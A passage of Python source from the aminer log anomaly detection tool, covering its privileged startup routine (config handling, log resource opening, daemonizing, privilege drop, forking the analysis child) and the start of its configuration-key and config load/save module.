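    conversion failure.
    """
    type_error = f"The {config_property} parameter must be of type {type(old_value)}!"
    try:
        # bool is checked before int because bool is a subclass of int.
        if isinstance(old_value, bool):
            if value == "True":
                return True
            if value == "False":
                return False
            _report_error_and_exit(type_error)
        if isinstance(old_value, int):
            return int(value)
        if isinstance(old_value, float):
            return float(value)
        if isinstance(old_value, list):
            return ast.literal_eval(value)
    except (ValueError, SyntaxError):
        # literal_eval raises SyntaxError for malformed input, which the previous ValueError-only handler let escape.
        _report_error_and_exit(type_error)
    return value


def _parse_log_resource_entry(resource):
    """Normalize one LogResourceList entry (a URL string or a dict) into the management dict used by main().

    The returned dict always carries "url" (bytes), "json", "xml" and "parser_id" (None when not given). Unknown keys, wrong
    value types, a dict without url, or json and xml set at the same time are configuration errors: the first three terminate
    the program, the last raises ValueError as before.
    """
    obj = {}
    if isinstance(resource, str):
        obj["url"] = decode_string_as_byte_string(resource)
    elif isinstance(resource, dict):
        for key, val in resource.items():
            if key not in ("url", "json", "xml", "parser_id"):
                _report_error_and_exit(f"Unknown argument in LogResourceList: {key}")
            if key == "json" and not isinstance(val, bool):
                _report_error_and_exit("Argument json must be of type boolean!")
            if key == "xml" and not isinstance(val, bool):
                _report_error_and_exit("Argument xml must be of type boolean!")
            obj[key] = val
        if "url" not in obj:
            # Without this check the lookup below fails with a bare KeyError instead of a configuration error.
            _report_error_and_exit("Every dict entry in LogResourceList must define a url")
    else:
        _report_error_and_exit("LogResourceList must be of type dict or string")
    if "json" in obj and "xml" in obj:
        msg = "Log resources can not be in the json and xml format at the same time."
        logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
        raise ValueError(msg)
    obj.setdefault("json", None)
    obj.setdefault("xml", None)
    obj.setdefault("parser_id", None)
    if isinstance(obj["url"], str):
        obj["url"] = decode_string_as_byte_string(obj["url"])
    return obj


def main():
    """Run the aminer main program.

    This is the privileged parent process. It validates the command line and configuration, opens all log resources and the
    remote control socket, optionally daemonizes, then forks and re-executes itself with --run-analysis as the (unprivileged)
    analysis child, handing the open descriptors over through a socketpair. Afterwards it only supervises the child and
    re-sends descriptors of rotated log files.
    """
    global offline_mode
    global child_termination_triggered_flag

    # Extract program name, but only when sure to contain no problematic characters.
    warnings.filterwarnings('ignore', category=ImportWarning)
    program_name = sys.argv[0].split('/')[-1]
    if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None):
        print('Invalid program name, check your execution args', file=sys.stderr)
        sys.exit(1)
    # Resolve the executable now: in daemon mode the cwd is changed to "/" below, after which a relative argv[0] could no
    # longer be found by execv().
    program_path = os.path.abspath(sys.argv[0])

    # We will not read stdin from here on, so get rid of it immediately, thus aberrant child cannot manipulate caller's stdin using it.
    stdin_fd = os.open('/dev/null', os.O_RDONLY)
    os.dup2(stdin_fd, 0)
    os.close(stdin_fd)

    parser = _build_argument_parser()
    args = parser.parse_args()
    if args.check_updates:
        _check_for_updates()

    # Same reason as for program_path: the analysis child receives this path after a possible chdir('/').
    original_config_file_name = os.path.abspath(args.config)
    config_file_name = original_config_file_name
    run_in_foreground_flag = args.daemon
    run_analysis_child_flag = args.run_analysis
    clear_persistence_flag = args.clear
    remove_persistence_dirs = args.remove
    from_begin_flag = args.from_begin
    offline_mode = args.offline_mode
    # Backup and removal targets are single directory names below the persistence directory; reject anything that could
    # leave it ("." and "/" are not allowed at all).
    if args.restore is not None and ('.' in args.restore or '/' in args.restore):
        parser.error(f"The restore path {args.restore} must not contain any . or /")
    if args.remove is not None:
        for remove in args.remove:
            if '.' in remove or '/' in remove:
                parser.error(f"The remove path {remove} must not contain any . or /")
    restore_relative_persistence_path = args.restore
    stat_level = 1
    debug_level = 1
    stat_level_console_flag = False
    debug_level_console_flag = False
    if args.stat is not None:
        stat_level = int(args.stat)
        stat_level_console_flag = True
    if args.debug is not None:
        debug_level = int(args.debug)
        debug_level_console_flag = True

    # Load the main configuration file.
    if not os.path.exists(config_file_name):
        print(f"{program_name}: config \"{config_file_name}\" not (yet) available!", file=sys.stderr)
        sys.exit(1)

    # using the solution here to override config_properties:
    # https://stackoverflow.com/questions/27146262/create-variable-key-value-pairs-with-argparse-python
    use_temp_config = False
    config_properties = parse_vars(args.config_properties)
    if args.config_properties and "LearnMode" in config_properties:
        ymlext = [".YAML", ".YML", ".yaml", ".yml"]
        extension = os.path.splitext(config_file_name)[1]
        if extension in ymlext:
            # LearnMode is a top-level YAML key and has to be patched into the file before it is loaded.
            use_temp_config = True
            config_file_name = _write_temp_config_with_learn_mode(config_file_name, config_properties["LearnMode"])
        else:
            _report_error_and_exit("The LearnMode parameter does not exist in .py configs!")

    # Minimal import to avoid loading too much within the privileged process.
    try:
        aminer_config = AminerConfig.load_config(config_file_name)
    except ValueError:
        sys.exit(1)
    finally:
        # The temporary copy is only needed for loading; drop it whether or not loading succeeded.
        if use_temp_config:
            os.remove(config_file_name)
            config_file_name = original_config_file_name

    for config_property, value in config_properties.items():
        if config_property == "LearnMode":
            continue
        old_value = aminer_config.config_properties.get(config_property)
        if old_value is not None:
            value = _convert_config_property(config_property, old_value, value)
        else:
            msg = f"The {config_property} parameter is not set in the config. It will be treated as a string!"
            print("WARNING: " + msg, file=sys.stderr)
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg)
        aminer_config.config_properties[config_property] = value

    persistence_dir = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR)
    child_user_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_USER)
    child_group_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_GROUP)
    # -1 means "do not change" for os.chown(), and "not configured" for the privilege drop below.
    child_user_id = -1
    child_group_id = -1
    try:
        if child_user_name is not None:
            child_user_id = getpwnam(child_user_name).pw_uid
        if child_group_name is not None:
            child_group_id = getgrnam(child_group_name).gr_gid
    except KeyError:
        print(f"Failed to resolve {AminerConfig.KEY_AMINER_USER} or {AminerConfig.KEY_AMINER_GROUP}", file=sys.stderr)
        sys.exit(1)

    # Command line levels win over the configured ones.
    if not stat_level_console_flag and AminerConfig.KEY_LOG_STAT_LEVEL in aminer_config.config_properties:
        stat_level = aminer_config.config_properties[AminerConfig.KEY_LOG_STAT_LEVEL]
    if not debug_level_console_flag and AminerConfig.KEY_LOG_DEBUG_LEVEL in aminer_config.config_properties:
        debug_level = aminer_config.config_properties[AminerConfig.KEY_LOG_DEBUG_LEVEL]
    if AminerConfig.CONFIG_KEY_ENCODING in aminer_config.config_properties:
        AminerConfig.ENCODING = aminer_config.config_properties[AminerConfig.CONFIG_KEY_ENCODING]
    AminerConfig.STAT_LEVEL = stat_level
    AminerConfig.DEBUG_LEVEL = debug_level
    initialize_loggers(aminer_config, child_user_id, child_group_id)

    if restore_relative_persistence_path is not None and (clear_persistence_flag or remove_persistence_dirs):
        _report_error_and_exit(
            'The --restore parameter removes all persistence files. Do not use this parameter with --Clear or --Remove!')
    if clear_persistence_flag:
        if remove_persistence_dirs:
            _report_error_and_exit('The --clear and --remove arguments must not be used together!')
        clear_persistence(persistence_dir)
    if remove_persistence_dirs:
        # Only the directories named on the command line are removed. (The previous implementation first deleted every
        # directory below the persistence directory, which made --remove behave like --clear.)
        for filename in remove_persistence_dirs:
            file_path = os.path.join(persistence_dir, filename)
            try:
                if not os.path.exists(file_path):
                    continue
                if not os.path.isdir(file_path):
                    _report_warning('The aminer persistence directory should not contain any files.')
                    continue
                shutil.rmtree(file_path)
            except OSError as e:
                msg = f"Failed to delete {file_path}. Reason: {e}"
                print(msg, file=sys.stderr)
                logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
    if restore_relative_persistence_path is not None:
        absolute_persistence_path = os.path.join(persistence_dir, 'backup', restore_relative_persistence_path)
        if not os.path.exists(absolute_persistence_path):
            _report_warning(f"{absolute_persistence_path} does not exist. Continuing without restoring persistence.")
        else:
            clear_persistence(persistence_dir)
            copytree(absolute_persistence_path, persistence_dir)
            persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH)
            # The restored tree was written by the privileged parent; hand it to the analysis child's user and group.
            for dirpath, _dirnames, filenames in os.walk(persistence_dir):
                os.chown(dirpath, child_user_id, child_group_id, dir_fd=persistence_dir_fd, follow_symlinks=False)
                for filename in filenames:
                    # Previously the user id was passed as the group id here, leaving files with the wrong group.
                    os.chown(os.path.join(dirpath, filename), child_user_id, child_group_id, dir_fd=persistence_dir_fd,
                             follow_symlinks=False)
    if from_begin_flag:
        repositioning_data_path = os.path.join(persistence_dir, 'AnalysisChild', 'RepositioningData')
        if os.path.exists(repositioning_data_path):
            os.remove(repositioning_data_path)

    if run_analysis_child_flag:
        # Call analysis process, this function will never return.
        run_analysis_child(aminer_config, program_name)

    # Start importing of aminer specific components after reading of "config.py" to allow replacement of components via sys.path
    # from within configuration.
    log_sources_list = aminer_config.config_properties.get(AminerConfig.KEY_LOG_SOURCES_LIST)
    if not log_sources_list:
        _report_error_and_exit(f"{program_name}: {AminerConfig.KEY_LOG_SOURCES_LIST} not defined")

    # Now create the management entries for each logfile.
    log_data_resource_dict = {}
    for resource in log_sources_list:
        obj = _parse_log_resource_entry(resource)
        url = obj["url"]
        if url.startswith(b'file://'):
            obj["log_resource"] = FileLogDataResource(url, -1)
        elif url.startswith(b'unix://'):
            obj["log_resource"] = UnixSocketLogDataResource(url, -1)
        else:
            _report_error_and_exit(
                "Config-Error: {'LogResourceList': 'Every log resource URL must be prefixed with either file:// or unix://.'}")
        if obj["xml"]:
            # NOTE(review): presumably an XML document has to be buffered as a whole before parsing — confirm with the resource classes.
            obj["log_resource"].default_buffer_size = 1 << 32
        # Both accepted schemes are 7 bytes long, so the path starts at offset 7.
        resource_path = url[7:].decode()
        if not os.path.exists(resource_path):
            _report_warning(f"WARNING: file or socket '{resource_path}' does not exist (yet)!")
        try:
            obj["log_resource"].open()
        except OSError as open_os_error:
            if open_os_error.errno == errno.EACCES:
                _report_error_and_exit(f"{program_name}: no permission to access {repr(obj)}")
            _report_error_and_exit(f"{program_name}: unexpected error opening {repr(obj)}: {open_os_error.errno} "
                                   f"({os.strerror(open_os_error.errno)})")
        log_data_resource_dict[url] = obj

    # Create the remote control socket, if any. Do this in privileged mode to allow binding it at arbitrary locations and support restricted
    # permissions of any type for current (privileged) uid.
    remote_control_socket_name = aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_SOCKET_PATH, None)
    remote_control_socket = None
    if remote_control_socket_name is not None:
        if os.path.exists(remote_control_socket_name):
            try:
                os.unlink(remote_control_socket_name)
            except OSError:
                _report_error_and_exit(f"Failed to clean up old remote control socket at {remote_control_socket_name}")
        # Create the local socket: there is no easy way to create it with correct permissions, hence a fork is needed, setting umask,
        # bind the socket. It is also recommended to create the socket in a directory having the correct permissions already.
        remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        remote_control_socket.setblocking(False)
        bind_child_pid = os.fork()
        if bind_child_pid == 0:
            # umask 0o177 leaves the socket file accessible to its owner only.
            os.umask(0o177)
            try:
                remote_control_socket.bind(remote_control_socket_name)
            except OSError as bind_error:
                print(f"Failed to bind remote control socket {remote_control_socket_name}: {bind_error}", file=sys.stderr)
                sys.stderr.flush()
                os._exit(1)
            # Do not perform any cleanup, flushing of streams. Use _exit(0) to avoid interference with fork.
            os._exit(0)
        _unused_pid, bind_status = os.waitpid(bind_child_pid, 0)
        # Previously a failed bind in the child went unnoticed and listen() was called on an unbound socket.
        if not (os.WIFEXITED(bind_status) and os.WEXITSTATUS(bind_status) == 0):
            _report_error_and_exit(f"Failed to create remote control socket at {remote_control_socket_name}")
        remote_control_socket.listen(4)

    # Now have checked all we can get from the configuration in the privileged process. Detach from the TTY when in daemon mode.
    if not run_in_foreground_flag:
        child_pid = 0
        try:
            # Fork a child to make sure, we are not the process group leader already.
            child_pid = os.fork()
        except Exception as fork_exception:
            _report_error_and_exit(f"Failed to daemonize: {fork_exception}")
        if child_pid != 0:
            # This is the parent.
            os._exit(0)
        # This is the child. Create a new session and become process group leader. Here we get rid of the controlling tty.
        os.setsid()
        # Fork again to become an orphaned process not being session leader, hence not able to get a controlling tty again.
        try:
            child_pid = os.fork()
        except Exception as fork_exception:
            _report_error_and_exit(f"Failed to daemonize: {fork_exception}")
        if child_pid != 0:
            # This is the parent.
            os._exit(0)
        # Move to root directory to avoid lingering in some cwd someone else might want to unmount.
        os.chdir('/')
        # Change the umask here to clean all group/other mask bits so that accidentially created files are not accessible by others.
        os.umask(0o77)

    # Install a signal handler catching common stop signals and relaying it to all children for sure.
    child_termination_triggered_flag = False

    def graceful_shutdown_handler(_signo, _stackFrame):
        """React on typical shutdown signals."""
        msg = f"{program_name}: caught signal, shutting down"
        print(msg, file=sys.stderr)
        logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg)
        # Just set the flag. It is likely, that child received same signal also so avoid multiple signaling, which could interrupt the
        # shutdown procedure again.
        global child_termination_triggered_flag
        child_termination_triggered_flag = True

    import signal
    signal.signal(signal.SIGHUP, graceful_shutdown_handler)
    signal.signal(signal.SIGINT, graceful_shutdown_handler)
    signal.signal(signal.SIGTERM, graceful_shutdown_handler)

    # Now create the socket to connect the analysis child.
    (parent_socket, child_socket) = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM, 0)
    # Have it nonblocking from here on.
    parent_socket.setblocking(False)
    child_socket.setblocking(False)

    # Use normal fork, we should have been detached from TTY already. Flush stderr to avoid duplication of output if both child and
    # parent want to write something.
    sys.stderr.flush()
    child_pid = os.fork()
    if child_pid == 0:
        # Relocate the child socket fd to 3 if needed; the analysis child expects it there.
        if child_socket.fileno() != 3:
            os.dup2(child_socket.fileno(), 3)
            child_socket.close()

        if os.getuid() == 0:
            # Clear the supplementary groups before dropping privileges. This makes only sense when changing the uid or gid.
            if ((child_user_id != -1) and (child_user_id != os.getuid())) or ((child_group_id != -1) and (child_group_id != os.getgid())):
                os.setgroups([])
            # Drop privileges before executing child. setuid/gid will raise an exception when call has failed. The group is
            # changed first, as setgid() is not permitted any more once the uid is unprivileged.
            if child_group_id != -1:
                os.setgid(child_group_id)
            if child_user_id != -1:
                os.setuid(child_user_id)
        else:
            msg = 'INFO: No privilege separation when started as unprivileged user'
            print(msg, file=sys.stderr)
            # child_user_id/child_group_id were resolved from the same configuration keys above.
            initialize_loggers(aminer_config, child_user_id, child_group_id)
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg)

        # Now resolve the specific analysis configuration file (if any).
        analysis_config_file_name = aminer_config.config_properties.get(AminerConfig.KEY_ANALYSIS_CONFIG_FILE, None)
        if analysis_config_file_name is None:
            analysis_config_file_name = config_file_name
        elif not os.path.isabs(analysis_config_file_name):
            analysis_config_file_name = os.path.join(os.path.dirname(config_file_name), analysis_config_file_name)

        # This is the child. Close all parent file descriptors, we do not need. Perhaps this could be done more elegantly.
        for close_fd in range(4, 1 << 16):
            try:
                os.close(close_fd)
            except OSError as close_os_error:
                if close_os_error.errno == errno.EBADF:
                    continue
                msg = f"{program_name}: unexpected exception closing file descriptors:{close_os_error}"
                print(msg, file=sys.stderr)
                logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
                # Flush stderr before exit without any cleanup.
                sys.stderr.flush()
                os._exit(1)

        # Now execute the very same program again, but user might have moved or renamed it meanwhile. This would be problematic with
        # SUID-binaries (which we do not yet support). Do NOT just fork but also exec to avoid child circumventing
        # parent's ALSR due to cloned kernel VMA.
        exec_args = ['aminerChild', '--run-analysis', '--config', analysis_config_file_name, '--stat', str(stat_level), '--debug',
                     str(debug_level)]
        if offline_mode:
            exec_args.append("--offline-mode")
        if args.config_properties:
            exec_args.append("--config-properties")
            exec_args.extend(args.config_properties)
        try:
            os.execv(program_path, exec_args)  # nosec B606
        except OSError as exec_error:
            # execv() raises on failure rather than returning, so the error report has to live in the except branch.
            msg = f"Failed to execute child process: {exec_error}"
            print(msg, file=sys.stderr)
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            sys.stderr.flush()
            os._exit(1)

    child_socket.close()

    # Send all log resource information currently available to child process.
    for url, obj in log_data_resource_dict.items():
        log_resource = obj["log_resource"]
        if (log_resource is not None) and (log_resource.get_file_descriptor() >= 0):
            SecureOSFunctions.send_logstream_descriptor(parent_socket, log_resource.get_file_descriptor(), url)
            log_resource.close()

    # Send the remote control server socket, if any and close it afterwards. It is not needed any more on parent side.
    if remote_control_socket is not None:
        SecureOSFunctions.send_annotated_file_descriptor(parent_socket, remote_control_socket.fileno(), 'remotecontrol', '')
        remote_control_socket.close()

    exit_status = 0
    child_termination_triggered_count = 0
    while True:
        if child_termination_triggered_flag:
            # Escalate: wait one round, then SIGTERM the child a few times, finally SIGKILL the whole process group (including us).
            if child_termination_triggered_count == 0:
                time.sleep(1)
            elif child_termination_triggered_count < 5:
                os.kill(child_pid, signal.SIGTERM)
            else:
                os.kill(0, signal.SIGKILL)
            child_termination_triggered_count += 1

        (sig_child_pid, sig_status) = os.waitpid(-1, os.WNOHANG)
        if sig_child_pid != 0:
            if sig_child_pid == child_pid:
                if child_termination_triggered_flag or offline_mode:
                    # This was expected, just terminate.
                    break
                # sig_status is the raw wait status; format it as hex instead of decimal behind a "0x" prefix.
                msg = f"{program_name}: Analysis child process {sig_child_pid} terminated unexpectedly with signal 0x{sig_status:x}"
                print(msg, file=sys.stderr)
                logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
                exit_status = 1
                break
            # So the child has been cloned, the clone has terminated. This should not happen either.
            msg = f"{program_name}: untracked child {sig_child_pid} terminated with signal 0x{sig_status:x}"
            print(msg, file=sys.stderr)
            logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
            exit_status = 1

        # Child information handled, scan for rotated logfiles or other resources, where reopening might make sense.
        for log_resource_name, obj in log_data_resource_dict.items():
            log_resource = obj["log_resource"]
            try:
                if not log_resource.open(reopen_flag=True):
                    continue
            except OSError as open_os_error:
                if open_os_error.errno == errno.EACCES:
                    msg = f"{program_name}: no permission to access {log_resource_name}"
                else:
                    msg = f"{program_name}: unexpected error reopening {log_resource_name}: {open_os_error.errno} " \
                          f"({os.strerror(open_os_error.errno)})"
                print(msg, file=sys.stderr)
                logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg)
                exit_status = 2
                continue
            SecureOSFunctions.send_logstream_descriptor(parent_socket, log_resource.get_file_descriptor(), log_resource_name)
            log_resource.close()
        time.sleep(1)

    parent_socket.close()
    SecureOSFunctions.close_base_directory()
    SecureOSFunctions.close_log_directory()
    sys.exit(exit_status)


main()
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/000077500000000000000000000000001500476301700272035ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/AminerConfig.py000066400000000000000000000237771500476301700321340ustar00rootroot00000000000000"""This module collects static configuration item keys and configuration loading and handling functions.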
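This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import importlib.util
import logging

# Configuration keys and their defaults. KEY_* names are looked up in config_properties; DEFAULT_* values apply when absent.
KEY_LOG_SOURCES_LIST = 'LogResourceList'
KEY_AMINER_USER = 'AminerUser'
KEY_AMINER_GROUP = 'AminerGroup'
KEY_ANALYSIS_CONFIG_FILE = 'AnalysisConfigFile'
KEY_PERSISTENCE_DIR = 'Core.PersistenceDir'
KEY_LOG_DIR = 'Core.LogDir'
DEFAULT_PERSISTENCE_DIR = '/var/lib/aminer'
DEFAULT_LOG_DIR = '/var/lib/aminer/log'
KEY_PERSISTENCE_PERIOD = 'Core.PersistencePeriod'
DEFAULT_PERSISTENCE_PERIOD = 600
KEY_REMOTE_CONTROL_SOCKET_PATH = 'RemoteControlSocket'
KEY_LOG_PREFIX = 'LogPrefix'
KEY_RESOURCES_MAX_MEMORY_USAGE = 'Resources.MaxMemoryUsage'
REMOTE_CONTROL_LOG_NAME = 'REMOTE_CONTROL'
KEY_REMOTE_CONTROL_LOG_FILE = 'Log.RemoteControlLogFile'
DEFAULT_REMOTE_CONTROL_LOG_FILE = 'aminerRemoteLog.log'
# Path of the last configuration file passed to load_config(); read back by save_config().
configFN = None
STAT_LEVEL = 1
STAT_LOG_NAME = 'STAT'
KEY_STAT_LOG_FILE = 'Log.StatisticsFile'
DEFAULT_STAT_LOG_FILE = 'statistics.log'
DEBUG_LEVEL = 1
DEBUG_LOG_NAME = 'DEBUG'
KEY_DEBUG_LOG_FILE = 'Log.DebugFile'
DEFAULT_DEBUG_LOG_FILE = 'aminer.log'
KEY_LOG_STAT_PERIOD = 'Log.StatisticsPeriod'
DEFAULT_STAT_PERIOD = 3600
KEY_LOG_STAT_LEVEL = 'Log.StatisticsLevel'
KEY_LOG_DEBUG_LEVEL = 'Log.DebugLevel'
KEY_LOG_ROTATION_MAX_BYTES = 'Log.Rotation.MaxBytes'
DEFAULT_LOG_ROTATION_MAX_BYTES = 2 << 19  # 1 Megabyte
KEY_LOG_ROTATION_BACKUP_COUNT = 'Log.Rotation.BackupCount'
DEFAULT_LOG_ROTATION_BACKUP_COUNT = 5
CONFIG_KEY_LOG_LINE_PREFIX = 'LogPrefix'
DEFAULT_LOG_LINE_PREFIX = ''
CONFIG_KEY_ENCODING = 'Log.Encoding'
ENCODING = 'utf-8'
KEY_AMINER_ID = 'AminerId'
KEY_LOG_LINE_IDENTIFIER = 'LogLineIdentifier'


def load_config(config_file_name):
    """Load the configuration file using the import module.

    A .py configuration is executed directly as a Python module. A YAML configuration (extension .yml/.yaml in any letter case)
    is loaded through the bundled YamlConfig.py module, whose load_yaml() receives the YAML path. The path given here is
    remembered in the module global configFN for save_config(). Because the file is executed as code, only trusted,
    administrator-controlled configuration files may be passed in.

    Returns the loaded module. Re-raises ValueError unchanged when the configuration content is invalid; any other loading
    failure is reported on stderr and the debug log and raised as a generic Exception carrying sys.exc_info().
    """
    global configFN
    configFN = config_file_name
    ymlext = ['.YAML', '.YML', '.yaml', '.yml']
    extension = os.path.splitext(config_file_name)[1]
    yaml_config = None
    if extension in ymlext:
        yaml_config = config_file_name
        config_file_name = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'YamlConfig.py')
    aminer_config = None
    try:
        spec = importlib.util.spec_from_file_location('aminer_config', config_file_name)
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        if yaml_config is not None:
            aminer_config.load_yaml(yaml_config)
    except ValueError as e:
        logging.getLogger(DEBUG_LOG_NAME).error(e)
        raise
    except Exception:
        msg = f"Failed to load configuration from {config_file_name}"
        print(msg, file=sys.stderr)
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        exception_info = sys.exc_info()
        logging.getLogger(DEBUG_LOG_NAME).error(exception_info)
        raise Exception(exception_info[0], exception_info[1], exception_info[2])
    return aminer_config


def build_persistence_file_name(aminer_config, *args):
    """Build the full persistence file name from persistence directory configuration and path parts.

    aminer_config must expose a config_properties mapping; KEY_PERSISTENCE_DIR is looked up there with
    DEFAULT_PERSISTENCE_DIR as fallback and joined with the given path parts.
    """
    persistence_dir_name = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR)
    return os.path.join(persistence_dir_name, *args)


def save_config(analysis_context, new_file):
    """Save the current configuration to a file by using the aminerRemoteControl.

    The configuration recorded in configFN is rewritten textually: config_properties assignments are updated to the current
    values, register_component() calls get the current component names, and the remote control log (from the last
    "INFO aminer started." entry on) is replayed to apply change_attribute_of_registered_analysis_component and
    add_handler_to_atom_filter_and_register_analysis_component calls. The result is written to new_file.

    Returns a status message that also collects any warnings produced on the way. This is plain string patching of a .py
    configuration; it is only expected to work for the layout produced by the project's own config files.
    """
    register_component = 'register_component('
    VAR_ID = 0
    msg = ""
    with open(configFN, "r") as file:
        old = file.read()
    for config_property in analysis_context.aminer_config.config_properties:
        find_str = f"config_properties['{config_property}'] = "
        pos = old.find(find_str)
        if pos == -1:
            msg += f"WARNING: {find_str}not found in the old config file.\n"
            rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME)
            rc_logger.warning(msg.strip('\n'))
        else:
            # The old value is everything up to the end of the assignment line.
            string = old[pos + len(find_str):]
            old_len = string.find('\n')
            string = string[:old_len]
            prop = analysis_context.aminer_config.config_properties[config_property]
            # Keep quoting when the old value was a quoted string; the guard on an empty value avoids an IndexError.
            if string and ((string[0] == "'" and string[-1] == "'") or (string[0] == '"' and string[-1] == '"')):
                prop = f"'{prop}'"
            if f"{string}" != f"{prop}":
                old = old[:pos + len(find_str)] + f"{prop}" + old[pos + len(find_str) + old_len:]
    for component_id in analysis_context.get_registered_component_ids():
        component = analysis_context.get_component_by_id(component_id)
        name = analysis_context.get_name_by_component(component)
        # Locate the (component_id + 1)-th register_component call; the loop stops early if there are fewer calls.
        start = 0
        old_start = 0
        for i in range(0, component_id + 1):
            start = start + 1
            start = old.find('.register_component(', start)
            if old_start > start:
                break
            old_start = start
        if old.find('component_name', start) < old.find(')', start):
            old_component_name_start = old.find('"', old.find('component_name', start))
            old_component_name_end = old.find('"', old_component_name_start + 1)
            if old_component_name_start > old.find(')', start) or old_component_name_start == -1:
                old_component_name_start = old.find("'", old.find('component_name', start))
                old_component_name_end = old.find("'", old_component_name_start + 1)
            old_len = old_component_name_end - old_component_name_start + 1
            old_component_name = old[old_component_name_start:]
            old_component_name = old_component_name[:old_len]
            if old_component_name != f'"{name}"':
                old = old[:old_component_name_start] + f'"{name}"' + old[old_component_name_end + 1:]
    log_dir = analysis_context.aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR)
    remote_control_log_file = analysis_context.aminer_config.config_properties.get(
        KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE))
    # Without the log nothing can be replayed; previously a read failure left "logs" unbound and crashed below.
    logs = []
    try:
        with open(remote_control_log_file, "r") as logFile:
            logs = logFile.readlines()
    except OSError as e:
        msg = f"Could not read {remote_control_log_file}: {e}\n"
        logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n'))
        print(msg, file=sys.stderr)
    # Only replay remote control calls issued since the last start of the aminer.
    i = len(logs) - 1
    while i > 0:
        if "INFO aminer started." in logs[i]:
            logs = logs[i:]
            break
        i = i - 1
    for i, log in enumerate(logs):
        if "REMOTECONTROL change_attribute_of_registered_analysis_component" in log:
            log = log[:log.find('#')]
            arr = log.split(',', 3)
            if arr[1].find("'") != -1:
                component_name = arr[1].split("'")[1]
            else:
                component_name = arr[1].split('"')[1]
            if arr[2].find("'") != -1:
                attr = arr[2].split("'")[1]
            else:
                attr = arr[2].split('"')[1]
            value = arr[3].strip().split(")")[0]
            pos = old.find(f'component_name="{component_name}"')
            if pos == -1:
                pos = old.find(f"component_name='{component_name}'")
            while old[pos] != '\n':
                pos = pos - 1
            # Find the variable holding the component and then the attribute inside its constructor call.
            pos = old.find(register_component, pos) + len(register_component)
            var = old[pos:old.find(',', pos)]
            pos = old.find(f"{var} =")
            if pos == -1:
                pos = old.find(f"{var}=")
            pos = old.find(attr, pos)
            p1 = old.find(")", pos)
            p2 = old.find(",", pos)
            if -1 not in (p1, p2):
                end = min(old.find(")", pos), old.find(",", pos))
            elif p1 == -1 and p2 == -1:
                msg += f"WARNING: '{component_name}.{attr}' could not be found in the current config!\n"
                rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME)
                rc_logger.warning(msg.strip('\n'))
                continue
            elif p1 == -1:
                end = p2
            elif p2 == -1:
                end = p1
            old = old[:old.find("=", pos) + 1] + f"{value}" + old[end:]
        if "REMOTECONTROL add_handler_to_atom_filter_and_register_analysis_component" in log:
            parameters = log.split(",", 2)
            # find the name of the filter_config variable in the old config.
            pos = old.find(parameters[1].strip())
            new_pos = pos
            while old[new_pos] != '\n':
                new_pos = new_pos - 1
            filter_config = old[new_pos:pos]
            pos = filter_config.find(register_component) + len(register_component)
            filter_config = filter_config[pos:filter_config.find(',', pos)].strip()
            new_parameters = parameters[2].split(")")
            component_name = new_parameters[1].strip(', ')
            var = f"analysis_component{VAR_ID}"
            VAR_ID = VAR_ID + 1
            old = old + f"\n {var} = {new_parameters[0].strip()})"
            old = old + f"\n {filter_config}.register_component({var}, component_name={component_name})"
            old = old + f"\n {filter_config}.add_handler({var})\n"
    # remove double lines
    old = old.replace('\n\n\n', '\n\n')
    try:
        with open(new_file, "w") as file:
            file.write(old)
        msg += f"Successfully saved the current config to {new_file}."
        logging.getLogger(DEBUG_LOG_NAME).info(msg)
        return msg
    except FileNotFoundError:
        msg += f"FAILURE: file '{new_file}' could not be found or opened!"
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        return msg
AminerRemoteControlExecutionMethods.py000066400000000000000000001166201500476301700366440ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer"""This module contains methods which can be executed from the aminerRemoteControl class.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
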